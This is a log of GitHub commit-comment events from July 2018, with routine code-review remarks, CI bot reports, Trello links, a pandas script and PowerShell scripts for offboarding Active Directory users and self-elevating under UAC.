{"id":"7966324226","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"NikolayNN/test-generator-sb"},"payload":{"comment":{"id":29710487,"position":30,"line":30,"path":"src/test/java/my/nhorushko/testgeneratorsb/testgeneratorsb/dao/QuestionBlockParserImplUserTest.java","commit_id":"873b732e77fcc3981ec39b9291c9c32dc6dfb8bb","created_at":"2018-07-14T20:32:14Z","updated_at":"2018-07-14T20:32:14Z","author_association":"NONE","body":"Обычно это просто отделяют пустыми строчками) Это и так понятно)"}},"created_at":"2018-07-14T20:32:14Z"}
{"id":"7966325493","type":"CommitCommentEvent","actor":{"login":"tejainece"},"repo":{"name":"Jaguar-dart/jaguar"},"payload":{"comment":{"id":29710489,"position":19,"line":245,"path":"jaguar/lib/src/http/context/context.dart","commit_id":"2282def50d4dd783ecd2fe68dc1e36fa3699fe5e","created_at":"2018-07-14T20:33:20Z","updated_at":"2018-07-14T20:33:20Z","author_association":"MEMBER","body":"Yeah. Noticed it a few days ago.\r\n\r\nThanks for the pull request to the test case to reproduce it. 👍 "}},"created_at":"2018-07-14T20:33:20Z"}
{"id":"7966325788","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"NikolayNN/test-generator-sb"},"payload":{"comment":{"id":29710492,"position":120,"line":120,"path":"src/test/java/my/nhorushko/testgeneratorsb/testgeneratorsb/service/TestGeneratorServiceUserTest.java","commit_id":"873b732e77fcc3981ec39b9291c9c32dc6dfb8bb","created_at":"2018-07-14T20:33:33Z","updated_at":"2018-07-14T20:33:33Z","author_association":"NONE","body":"Мне понравилось)"}},"created_at":"2018-07-14T20:33:33Z"}
{"id":"7966327729","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29710493,"position":null,"line":null,"path":null,"commit_id":"dc5e19a0e2df45fab245418be91d01dd8e84d9a0","created_at":"2018-07-14T20:35:12Z","updated_at":"2018-07-14T20:35:12Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [v0.1](https://trello.com/c/FdoHICX9/53-v01)"}},"created_at":"2018-07-14T20:35:12Z"}
{"id":"7966327973","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29710494,"position":null,"line":null,"path":null,"commit_id":"2abee45a04c00ee88dd8108295d3cd11e86f2257","created_at":"2018-07-14T20:35:25Z","updated_at":"2018-07-14T20:35:25Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [v0.2](https://trello.com/c/b8DrjMCt/54-v02)"}},"created_at":"2018-07-14T20:35:25Z"}
{"id":"7966330157","type":"CommitCommentEvent","actor":{"login":"MarceloFCandido"},"repo":{"name":"MarceloFCandido/PIC02"},"payload":{"comment":{"id":29710498,"position":null,"line":null,"path":null,"commit_id":"5d2d7a9bb8d356a467badb923a66e607eb1e8f97","created_at":"2018-07-14T20:37:19Z","updated_at":"2018-07-14T20:37:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar o calculador copiando o código em Python](https://trello.com/c/sjzfh5R9/32-criar-o-calculador-copiando-o-c%C3%B3digo-em-python)"}},"created_at":"2018-07-14T20:37:19Z"}
{"id":"7966330415","type":"CommitCommentEvent","actor":{"login":"MarceloFCandido"},"repo":{"name":"MarceloFCandido/PIC02"},"payload":{"comment":{"id":29710501,"position":null,"line":null,"path":null,"commit_id":"984fa70730033b2eec7c097eb29495e57970247e","created_at":"2018-07-14T20:37:33Z","updated_at":"2018-07-14T20:37:33Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar o calculador copiando o código em Python](https://trello.com/c/sjzfh5R9/32-criar-o-calculador-copiando-o-c%C3%B3digo-em-python)"}},"created_at":"2018-07-14T20:37:33Z"}
{"id":"7966330532","type":"CommitCommentEvent","actor":{"login":"MarceloFCandido"},"repo":{"name":"MarceloFCandido/PIC02"},"payload":{"comment":{"id":29710502,"position":null,"line":null,"path":null,"commit_id":"bb2b329ccb19a295aee30a23f7e38ae43bba2b0c","created_at":"2018-07-14T20:37:40Z","updated_at":"2018-07-14T20:37:40Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar o calculador copiando o código em Python](https://trello.com/c/sjzfh5R9/32-criar-o-calculador-copiando-o-c%C3%B3digo-em-python)"}},"created_at":"2018-07-14T20:37:40Z"}
{"id":"7966330625","type":"CommitCommentEvent","actor":{"login":"MarceloFCandido"},"repo":{"name":"MarceloFCandido/PIC02"},"payload":{"comment":{"id":29710503,"position":null,"line":null,"path":null,"commit_id":"da6df599753bdc298862a5b6685212e2c4c5320e","created_at":"2018-07-14T20:37:45Z","updated_at":"2018-07-14T20:37:45Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar o calculador copiando o código em Python](https://trello.com/c/sjzfh5R9/32-criar-o-calculador-copiando-o-c%C3%B3digo-em-python)"}},"created_at":"2018-07-14T20:37:45Z"}
{"id":"7966330773","type":"CommitCommentEvent","actor":{"login":"MarceloFCandido"},"repo":{"name":"MarceloFCandido/PIC02"},"payload":{"comment":{"id":29710504,"position":null,"line":null,"path":null,"commit_id":"f4ef4dab5cef774ae50888a73beb80af5017f744","created_at":"2018-07-14T20:37:54Z","updated_at":"2018-07-14T20:37:54Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar o calculador copiando o código em Python](https://trello.com/c/sjzfh5R9/32-criar-o-calculador-copiando-o-c%C3%B3digo-em-python)"}},"created_at":"2018-07-14T20:37:54Z"}
{"id":"7966331102","type":"CommitCommentEvent","actor":{"login":"MarceloFCandido"},"repo":{"name":"MarceloFCandido/PIC02"},"payload":{"comment":{"id":29710507,"position":null,"line":null,"path":null,"commit_id":"45f04c4745deef736cf73c3d30504397009dd089","created_at":"2018-07-14T20:38:13Z","updated_at":"2018-07-14T20:38:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar visualizador de modelos de velocidade](https://trello.com/c/G61Tissm/36-criar-visualizador-de-modelos-de-velocidade)"}},"created_at":"2018-07-14T20:38:13Z"}
{"id":"7966331616","type":"CommitCommentEvent","actor":{"login":"pokeron1"},"repo":{"name":"pokeron1/Sports-Website"},"payload":{"comment":{"id":29710510,"position":null,"line":null,"path":null,"commit_id":"b3482f4443b49dcc18ab625f49bca74186a7c91e","created_at":"2018-07-14T20:38:41Z","updated_at":"2018-07-14T20:38:41Z","author_association":"OWNER","body":"@Asametric My github kinda glitched out. It sgowed up as you removing half of the code and adding nothing"}},"created_at":"2018-07-14T20:38:41Z"}
{"id":"7966331674","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-ocl-client"},"payload":{"comment":{"id":29710511,"position":5,"line":15,"path":"src/redux/actions/concepts/addExistingConcepts/index.js","commit_id":"07526f8773c50369716f07ddc85d154038ce2bdf","created_at":"2018-07-14T20:38:44Z","updated_at":"2018-07-14T20:38:44Z","author_association":"MEMBER","body":"Do you have a test for this?"}},"created_at":"2018-07-14T20:38:44Z"}
{"id":"7966331701","type":"CommitCommentEvent","actor":{"login":"zeule"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29710512,"position":null,"line":null,"path":null,"commit_id":"0ad52903890fe680307b46f4051bdd91d8aaffd5","created_at":"2018-07-14T20:38:46Z","updated_at":"2018-07-14T20:38:46Z","author_association":"CONTRIBUTOR","body":"@tudor2k3: Test builds with disabled GUI pass. I will be happy to make additional corrections if there are any problems."}},"created_at":"2018-07-14T20:38:46Z"}
{"id":"7966333768","type":"CommitCommentEvent","actor":{"login":"LucidOne"},"repo":{"name":"ansible/ansible"},"payload":{"comment":{"id":29710517,"position":null,"line":null,"path":null,"commit_id":"3935cce394e0827959356e8238f03c2d30880dfb","created_at":"2018-07-14T20:40:21Z","updated_at":"2018-07-14T20:40:21Z","author_association":"CONTRIBUTOR","body":"This worked for me. Thanks!\r\n:+1: "}},"created_at":"2018-07-14T20:40:21Z"}
{"id":"7966336182","type":"CommitCommentEvent","actor":{"login":"PaulESantos"},"repo":{"name":"PaulESantos/PaulESantos"},"payload":{"comment":{"id":29710523,"position":null,"line":null,"path":null,"commit_id":"1d5dd7cb3cdb82448276c8eaef7fe8cbbe0a1b93","created_at":"2018-07-14T20:42:25Z","updated_at":"2018-07-14T20:42:25Z","author_association":"OWNER","body":"rename project"}},"created_at":"2018-07-14T20:42:25Z"}
{"id":"7966338560","type":"CommitCommentEvent","actor":{"login":"RagedElimanator"},"repo":{"name":"storm119/superuber-kernel-angler"},"payload":{"comment":{"id":29710524,"position":null,"line":null,"path":null,"commit_id":"4122f0377dfff8443a44bff2a00c050b7ac47ac0","created_at":"2018-07-14T20:44:23Z","updated_at":"2018-07-14T20:44:23Z","author_association":"NONE","body":"What do you mean by  * fix some shit warning?"}},"created_at":"2018-07-14T20:44:23Z"}
{"id":"7966343469","type":"CommitCommentEvent","actor":{"login":"pck228"},"repo":{"name":"pck228/MrSupervisorWebsite"},"payload":{"comment":{"id":29710532,"position":null,"line":null,"path":null,"commit_id":"63f181837157151323de30369c5b4033ef21b1fe","created_at":"2018-07-14T20:48:33Z","updated_at":"2018-07-14T20:48:33Z","author_association":"OWNER","body":"PKSome comment again."}},"created_at":"2018-07-14T20:48:33Z"}
{"id":"7966343841","type":"CommitCommentEvent","actor":{"login":"OGFris"},"repo":{"name":"SpecterTeam/ProxyChecker"},"payload":{"comment":{"id":29710533,"position":null,"line":null,"path":null,"commit_id":"86b5131009ded9badf59fb39ff08355fb81d673a","created_at":"2018-07-14T20:48:50Z","updated_at":"2018-07-14T20:48:50Z","author_association":"MEMBER","body":"@SOF3 understood, the online API will be re-written in Go and public soon :100: "}},"created_at":"2018-07-14T20:48:50Z"}
{"id":"7966346646","type":"CommitCommentEvent","actor":{"login":"brentadamson"},"repo":{"name":"jivesearch/jivesearch"},"payload":{"comment":{"id":29710534,"position":null,"line":null,"path":null,"commit_id":"ec6f094dfd940450336f6b48be10f5e9411a717f","created_at":"2018-07-14T20:50:45Z","updated_at":"2018-07-14T20:50:45Z","author_association":"MEMBER","body":"#38 "}},"created_at":"2018-07-14T20:50:45Z"}
{"id":"7966348477","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710536,"position":null,"line":null,"path":null,"commit_id":"ee180c57ba07a13b087f669889a842078a5e628d","created_at":"2018-07-14T20:52:16Z","updated_at":"2018-07-14T20:52:16Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1686 of 1686 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee180c57ba07a13b087f669889a842078a5e628d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee180c57ba07a13b087f669889a842078a5e628d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee180c57ba07a13b087f669889a842078a5e628d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-14T20:52:16Z"}
{"id":"7966349396","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/bitstruct-feedstock"},"payload":{"comment":{"id":29710537,"position":null,"line":null,"path":null,"commit_id":"a897bacc17f9c3584018c73787adac6b41846bb0","created_at":"2018-07-14T20:53:09Z","updated_at":"2018-07-14T20:53:09Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @eerimoq were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @eerimoq were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-14T20:53:09Z"}
{"id":"7966351464","type":"CommitCommentEvent","actor":{"login":"jaames"},"repo":{"name":"Flipnote-Collective/flipnote-studio-3d-docs"},"payload":{"comment":{"id":29710540,"position":null,"line":null,"path":null,"commit_id":"00b2acf74e475e099761501eaf35d242e48181f9","created_at":"2018-07-14T20:54:59Z","updated_at":"2018-07-14T20:54:59Z","author_association":"CONTRIBUTOR","body":"god damn i cant type"}},"created_at":"2018-07-14T20:54:59Z"}
{"id":"7966351490","type":"CommitCommentEvent","actor":{"login":"saketkhan"},"repo":{"name":"saketkhan/Hello-World"},"payload":{"comment":{"id":29710541,"position":1,"line":1,"path":"README.md","commit_id":"0a334f6c85ee703122f05734d47abd83b70aa07c","created_at":"2018-07-14T20:55:00Z","updated_at":"2018-07-14T20:55:00Z","author_association":"OWNER","body":"import csv\r\nimport pandas as pd \r\nimport numpy as np\r\nfrom datetime import datetime\r\nfrom datetime import timedelta\r\nresult_= \"output_test.csv\"\r\nwith open (result_,'w+') as f:\r\n    f.write('somedata\\n')\r\nfile = \"july-report.csv\"\r\ndf = pd.read_csv(file)\r\n\r\nnew = df[['packettimestamp', 'spn_id_speed_s1','spn_id_speed_s2','spn_id_speed_s3', 'spn_id_speed_s4','spn_id_speed_s5']].copy()\r\ndf2 = pd.melt(new, id_vars=[\"packettimestamp\"], \r\n                  var_name=\"Variable\", value_name=\"Value\")\r\ndf2 = df2.sort_values(by=[\"packettimestamp\",\"Variable\"],ascending=[True,True])\r\n\r\ndf2=df2.reset_index(drop=True)\r\ndf2.Value = pd.to_numeric(df2.Value, errors='coerce').fillna(0).astype(np.int64)\r\ndf2['acc']=''\r\nfor i in range (0, len(df2.Value)-1):\r\n    df2.acc[i]=df2.Value[i+1]-df2.Value[i]\r\ndf2['v0_15'] = np.where(df2['Value']<=15, 'yes', 'no')\r\ndf2['v15_30'] = np.where(df2['Value']>15,'yes','no')\r\ndf2['test']=df2.packettimestamp.str[0:19]\r\nfor a in range(0,len(df2.packettimestamp)):\r\n    df2.test[a] = datetime.strptime(df2.test[a],'%Y-%m-%dT%H:%M:%S')\r\n    if a == len(df2.packettimestamp):\r\n      break\r\ndf2['test1']=df2['test']\r\nfor i in range (1,len(df2.Value)):\r\n    if (df2.test[i]==df2.test[i-1]):\r\n        df2.test1[i]=df2.test1[i-1]+ timedelta(seconds=1)\r\n    i+=1\r\n    \r\nresult = df2\r\nresult"}},"created_at":"2018-07-14T20:55:00Z"}
{"id":"7966353203","type":"CommitCommentEvent","actor":{"login":"phakaporns"},"repo":{"name":"whatwg/wattsi"},"payload":{"comment":{"id":29710542,"position":null,"line":null,"path":null,"commit_id":"518f047c64aec74f4a911ce3862b4327f1ec4756","created_at":"2018-07-14T20:56:32Z","updated_at":"2018-07-14T20:56:32Z","author_association":"NONE","body":"Chb"}},"created_at":"2018-07-14T20:56:32Z"}
{"id":"7966353790","type":"CommitCommentEvent","actor":{"login":"EdyJo"},"repo":{"name":"EdyJo/Typora-i18n"},"payload":{"comment":{"id":29710543,"position":25,"line":25,"path":"id-ID.lproj/Front.strings","commit_id":"c668c0b2779378170fad7ffd9576527500f99948","created_at":"2018-07-14T20:56:56Z","updated_at":"2018-07-14T20:56:56Z","author_association":"OWNER","body":"Ganti"}},"created_at":"2018-07-14T20:56:56Z"}
{"id":"7966354061","type":"CommitCommentEvent","actor":{"login":"ryansiler"},"repo":{"name":"ryansiler/powershellscripts"},"payload":{"comment":{"id":29710544,"position":1,"line":1,"path":"README.md","commit_id":"4b4f14509e4d4d1b576adf15cbf81f0a7a467455","created_at":"2018-07-14T20:57:09Z","updated_at":"2018-07-14T20:57:09Z","author_association":"OWNER","body":"  #Import Active Directory Module\r\nImport-Module ActiveDirectory \r\n\r\n\r\n#Variables for Script\r\n$_Name=Read-Host \"Input sAMAccountname you wish to disable\"\r\n$_Date=Get-Date -Format \"MM/dd/yyyy\"\r\n$_Creds=Get-Credential\r\n\r\n#Disable the Account by Input in $_Name Variable\r\nDisable-ADAccount -Identity $_Name -Credential $_Creds\r\nwrite-host \"Disabling $_Name\" -ForegroundColor Green\r\n\r\n#Pulls the Name by Input and Moves the Account to Disabled Users\r\nGEt-AdUser $_Name | Move-ADObject -TargetPath \"OU=wherever,OU=your,OU=disabled,OU=user,DC=ou,DC=is\" -Credential $_Creds\r\nwrite-host \"Moving $_Name to Disabled Users\" -ForegroundColor Green\r\n\r\n#Sets the Description to Date the Script was ran and scrubs Office and Department to clear up Dynamic Distribution Lists\r\nSet-ADUser $_Name -Description \"Disabled on $_Date\" -Office $null -Department $null -Credential $_Creds\r\nwrite-host \"Changing Description to Disabled on $_Date\" -ForegroundColor Green\r\n\r\n#Removes All Group Membership except for Domain Users from User\r\n$group = get-adgroup \"Domain Users\"\r\n$groupSid = $group.sid\r\n$groupSid\r\n[int]$GroupID = $groupSid.Value.Substring($groupSid.Value.LastIndexOf(\"-\")+1)\r\nGet-ADUser $_Name | Set-ADObject -Replace @{primaryGroupID=\"$GroupID\"} -Credential $_Creds\r\nRemove-ADPrincipalGroupMembership -Identity $_Name -MemberOf $(Get-ADPrincipalGroupMembership -Identity $_Name -Credential $_Creds| Where-Object {$_.Name -ne \"Domain Users\"}) -Confirm:$false \r\nWrite-Host \"Removing All Group Membership for $_Name\" -ForegroundColor Green\r\n\r\n#Creates a variable that configures a remote session to our Exchange Servers to allow Exchange commands through powershell \r\n$s=New-PSSession -ConfigurationName microsoft.exchange -ConnectionUri http://yourexchangeserver.yourdomain.local/powershell -Credential $_Creds -AllowRedirection \r\nWrite-Host \"Creating New Exchange Session\" -ForegroundColor Green\r\n\r\n#Imports the configured remote session\r\nImport-PSSession $s -DisableNameChecking\r\nWrite-Host \"Importing New Exchange Session\" -ForegroundColor Green\r\n\r\n#Hides User from GAL\r\nSet-Mailbox -Identity $_Name -HiddenFromAddressListsEnabled $false\r\nSet-Mailbox -Identity $_Name -HiddenFromAddressListsEnabled $true\r\nWrite-Host \"Hiding $_Name from the GAL\" -ForegroundColor Green\r\n\r\n#Disables ActiveSync for the mailbox\r\nSet-CASMailbox -Identity $_Name -ActiveSyncEnabled $false \r\nwrite-host \"ActiveSync has been Disabled for $_Name\" -ForegroundColor Green\r\n\r\n#Removes Calendar Meeting Items in Exchange\r\nSearch-Mailbox –identity $_Name –SearchQuery kind:meetings –DeleteContent\r\nWrite-Host \"Removing Calendar Items for $_Name\" -ForegroundColor Green\r\n\r\n#AssignManagertheMailbox\r\n$_manager=(get-aduser (get-aduser $_Name -Properties manager).manager).samaccountName\r\nAdd-MailboxPermission -Identity $_Name -User $_Manager -AccessRights FullAccess -InheritanceType All \r\nWrite-Host \"Assigning mailbox for $_Name to $_Manager\" -ForegroundColor Green\r\n\r\n#closes the remote session\r\nRemove-PSSession $s  \r\nWrite-Host \"Closing Exchange Session\" -ForegroundColor Green\r\n\r\n\r\n#Hard Stop for Script to keep window open\r\nRead-Host \"Press any key to close!\" "}},"created_at":"2018-07-14T20:57:09Z"}
{"id":"7966354768","type":"CommitCommentEvent","actor":{"login":"ryansiler"},"repo":{"name":"ryansiler/powershellscripts"},"payload":{"comment":{"id":29710545,"position":1,"line":1,"path":"README.md","commit_id":"4b4f14509e4d4d1b576adf15cbf81f0a7a467455","created_at":"2018-07-14T20:57:45Z","updated_at":"2018-07-14T20:57:45Z","author_association":"OWNER","body":"Used for:\r\n\r\nprompts for name then-\r\n\r\nDisables User\r\n\r\nMoves to Disabled OU\r\n\r\nChanges Description to date disabled\r\n\r\nRemoves all Security Groups except Domain Users\r\n\r\nHides user from GAL\r\n\r\nDisables ActiveSync\r\n\r\nRemoves all Calendar Meeting items in Exchange"}},"created_at":"2018-07-14T20:57:45Z"}
{"id":"7966357988","type":"CommitCommentEvent","actor":{"login":"achubaty"},"repo":{"name":"PredictiveEcology/reproducible"},"payload":{"comment":{"id":29710553,"position":null,"line":null,"path":null,"commit_id":"bb37230fe022b001c297d25692e5c2441b292bb2","created_at":"2018-07-14T21:00:25Z","updated_at":"2018-07-14T21:00:25Z","author_association":"COLLABORATOR","body":"development and master are now both v0.2.2, so this branch should be 0.2.2.9002"}},"created_at":"2018-07-14T21:00:25Z"}
{"id":"7966358433","type":"CommitCommentEvent","actor":{"login":"InfusOnWoW"},"repo":{"name":"WeakAuras/WeakAuras2"},"payload":{"comment":{"id":29710555,"position":11,"line":1103,"path":"WeakAuras/WeakAuras.lua","commit_id":"9057e1d6915e21b487bf1cb09309d7f65a949fd9","created_at":"2018-07-14T21:00:44Z","updated_at":"2018-07-14T21:00:44Z","author_association":"CONTRIBUTOR","body":"db.update_preferences won't always exist."}},"created_at":"2018-07-14T21:00:44Z"}
{"id":"7966358555","type":"CommitCommentEvent","actor":{"login":"ryansiler"},"repo":{"name":"ryansiler/powershellscripts"},"payload":{"comment":{"id":29710556,"position":null,"line":null,"path":null,"commit_id":"4b4f14509e4d4d1b576adf15cbf81f0a7a467455","created_at":"2018-07-14T21:00:49Z","updated_at":"2018-07-14T21:00:49Z","author_association":"OWNER","body":"param([switch]$Elevated)\r\n\r\nfunction Test-Admin {\r\n  $currentUser = New-Object Security.Principal.WindowsPrincipal $([Security.Principal.WindowsIdentity]::GetCurrent())\r\n  $currentUser.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)\r\n}\r\n\r\nif ((Test-Admin) -eq $false)  {\r\n    if ($elevated) \r\n    {\r\n        # tried to elevate, did not work, aborting\r\n    } \r\n    else {\r\n        Start-Process powershell.exe -Verb RunAs -ArgumentList ('-noprofile -noexit -file \"{0}\" -elevated' -f ($myinvocation.MyCommand.Definition))\r\n}\r\n\r\nexit\r\n}"}},"created_at":"2018-07-14T21:00:49Z"}
{"id":"7966360865","type":"CommitCommentEvent","actor":{"login":"ryansiler"},"repo":{"name":"ryansiler/powershellscripts"},"payload":{"comment":{"id":29710557,"position":null,"line":null,"path":null,"commit_id":"4b4f14509e4d4d1b576adf15cbf81f0a7a467455","created_at":"2018-07-14T21:02:36Z","updated_at":"2018-07-14T21:02:36Z","author_association":"OWNER","body":"\\**used **for**** running elevated privilege powershell scripts , add to other scripts before main body, checks and performs UAC elevation. "}},"created_at":"2018-07-14T21:02:36Z"}
{"id":"7966368048","type":"CommitCommentEvent","actor":{"login":"ZSalyer"},"repo":{"name":"ZSalyer/SimBAlink-CL"},"payload":{"comment":{"id":29710560,"position":null,"line":null,"path":null,"commit_id":"27e6cccf695aec37a2caec43649f3bbb9292f4e5","created_at":"2018-07-14T21:08:36Z","updated_at":"2018-07-14T21:08:36Z","author_association":"OWNER","body":"Calculates Velocity profile and never has acceleration exceed limits."}},"created_at":"2018-07-14T21:08:36Z"}
{"id":"7966368696","type":"CommitCommentEvent","actor":{"login":"Bundesferkel"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29710561,"position":null,"line":null,"path":null,"commit_id":"12317b3d7e172923b9137023637c0de38175ecff","created_at":"2018-07-14T21:09:09Z","updated_at":"2018-07-14T21:09:09Z","author_association":"NONE","body":"These changes can't be compiled, Visual Studio 2017 throws an error:\r\n\r\n1>------ Erstellen gestartet: Projekt: revision_data.h, Konfiguration: Release x64 ------\r\n2>------ Erstellen gestartet: Projekt: scripts_brokenisles, Konfiguration: Release x64 ------\r\n2>   Bibliothek \"O:/mmo/ashamanecore/area-52/dev/build/src/server/scripts/Release/scripts_brokenisles.lib\" und Objekt \"O:/mmo/ashamanecore/area-52/dev/build/src/server/scripts/Release/scripts_brokenisles.exp\" werden erstellt.\r\n2>class_hall_warrior.obj : error LNK2019: Verweis auf nicht aufgelöstes externes Symbol \"\"public: virtual class WorldPacket const * __cdecl WorldPackets::Spells::CustomLoadScreen::Write(void)\" (?Write@CustomLoadScreen@Spells@WorldPackets@@UEAAPEBVWorldPacket@@XZ)\" in Funktion \"\"private: void __cdecl spell_class_hall_warrior_jump_teleport::HandleTeleport(enum SpellEffIndex)\" (?HandleTeleport@spell_class_hall_warrior_jump_teleport@@AEAAXW4SpellEffIndex@@@Z)\".\r\n2>O:\\mmo\\ashamanecore\\area-52\\dev\\build\\bin\\Release\\scripts\\scripts_brokenisles.dll : fatal error LNK1120: 1 nicht aufgelöste Externe\r\n2>Die Erstellung des Projekts \"scripts_brokenisles.vcxproj\" ist abgeschlossen -- FEHLER."}},"created_at":"2018-07-14T21:09:09Z"}
{"id":"7966374243","type":"CommitCommentEvent","actor":{"login":"robertlipe"},"repo":{"name":"gpsbabel/gpsbabel"},"payload":{"comment":{"id":29710567,"position":22,"line":51,"path":"arcdist.cc","commit_id":"6dcf6aa3e5e2115f2fb06c95859329b0ed61a966","created_at":"2018-07-14T21:13:47Z","updated_at":"2018-07-14T21:13:47Z","author_association":"COLLABORATOR","body":"Yes. Sorry.\n\nOn Fri, Jul 13, 2018 at 10:43 AM tsteven4 <notifications@github.com> wrote:\n\n> Isn't these series of static_casts better replaced with\n> Waypoint* waypointp = reinterpret_cast<Waypoint*>(elem);\n> ?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gpsbabel/gpsbabel/commit/6dcf6aa3e5e2115f2fb06c95859329b0ed61a966#commitcomment-29701751>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIUh79u7wgX3Y2oY6-aE_M-h-4FifKg2ks5uGMA6gaJpZM4VPGsC>\n> .\n>\n"}},"created_at":"2018-07-14T21:13:47Z"}
{"id":"7966374966","type":"CommitCommentEvent","actor":{"login":"davypough"},"repo":{"name":"davypough/Wouldwork"},"payload":{"comment":{"id":29710569,"position":null,"line":null,"path":null,"commit_id":"e79187222c7d9257cdf19dbc44b20b80b4f99d3f","created_at":"2018-07-14T21:14:24Z","updated_at":"2018-07-14T21:14:24Z","author_association":"OWNER","body":"[Wouldwork User Manual(4).pdf](https://github.com/davypough/Wouldwork/files/2195276/Wouldwork.User.Manual.4.pdf)\r\n"}},"created_at":"2018-07-14T21:14:24Z"}
{"id":"7966376322","type":"CommitCommentEvent","actor":{"login":"saibatizoku"},"repo":{"name":"saibatizoku/font8x8-rs"},"payload":{"comment":{"id":29710573,"position":null,"line":null,"path":null,"commit_id":"45c75bdd7e497a6626520d08e9b322d27bba27dd","created_at":"2018-07-14T21:15:25Z","updated_at":"2018-07-14T21:15:25Z","author_association":"OWNER","body":"Closes #2 "}},"created_at":"2018-07-14T21:15:25Z"}
{"id":"7966376575","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710575,"position":null,"line":null,"path":null,"commit_id":"ad15e3194b2f6fec8eb72dc1180e90349fa3be60","created_at":"2018-07-14T21:15:37Z","updated_at":"2018-07-14T21:15:37Z","author_association":"NONE","body":"#6476-EquationFix (RKStrand) - x86_64-MacOS-10.9-clang: OK (2940 of 2940 tests passed, 9 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ad15e3194b2f6fec8eb72dc1180e90349fa3be60-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ad15e3194b2f6fec8eb72dc1180e90349fa3be60-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T21:15:37Z"}
{"id":"7966379942","type":"CommitCommentEvent","actor":{"login":"ElijahLynn"},"repo":{"name":"ElijahLynn/pantheon-d8-composer-project-elijah"},"payload":{"comment":{"id":29710577,"position":null,"line":null,"path":null,"commit_id":"a3bca4db83f26d83550bbca8e72bc87d86ca625b","created_at":"2018-07-14T21:18:42Z","updated_at":"2018-07-14T21:18:42Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-elijah#pr-2](https://dashboard.pantheon.io/sites/6e332848-a68a-42aa-9fb5-563febca7197#pr-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-2-pantheon-d8-composer-project-elijah.pantheonsite.io/)"}},"created_at":"2018-07-14T21:18:42Z"}
